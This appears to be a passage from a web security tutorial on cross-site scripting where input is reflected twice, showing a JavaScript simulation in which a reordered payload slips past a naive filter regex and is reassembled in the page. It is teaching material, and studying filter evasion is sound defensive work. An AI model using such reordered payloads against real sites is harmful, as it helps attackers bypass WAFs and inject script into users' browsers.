

In multi-reflection scenarios, as we have already seen here, it’s possible to craft payloads that avoid filters and WAFs (Web Application Firewalls) by changing the order of their elements.
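To make the reordering idea concrete, here is a minimal sketch that only simulates the string handling involved. The page template (`render`) and the pattern check (`looksDangerous`) are hypothetical and stand in for a real application and a real filter, which will usually be more elaborate. The reordered payload is one possible example, not the only way to do it.

```javascript
// Hypothetical page that reflects the same input at two points.
function render(input) {
  return `<p>You searched for ${input}. No results for ${input}.</p>`;
}

// Hypothetical naive filter rule: a tag opening followed, inside the same tag,
// by an event handler attribute (e.g. <svg onload=...>).
function looksDangerous(text) {
  return /<\w+[^>]*\bon\w+\s*=/i.test(text);
}

const inOrder = "<svg onload=alert(1)>";
// Same elements in reverse order: the handler comes first, the tag opening last.
const reordered = "'onload=alert(1)><svg/1='";

console.log(looksDangerous(inOrder));           // true: the filter catches the usual order
console.log(looksDangerous(reordered));         // false: the input alone does not match the rule
console.log(looksDangerous(render(reordered))); // true: the two reflections rebuild the pattern
```

The input passes the check because the handler appears before the tag opening. In the rendered page, the tag opening from the first reflection and the handler from the second one end up in the usual order, with the text between them absorbed into a quoted dummy attribute.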



But in source-based JS injections (those that happen inside script blocks), there’s another interesting consequence of having more than one reflection point.
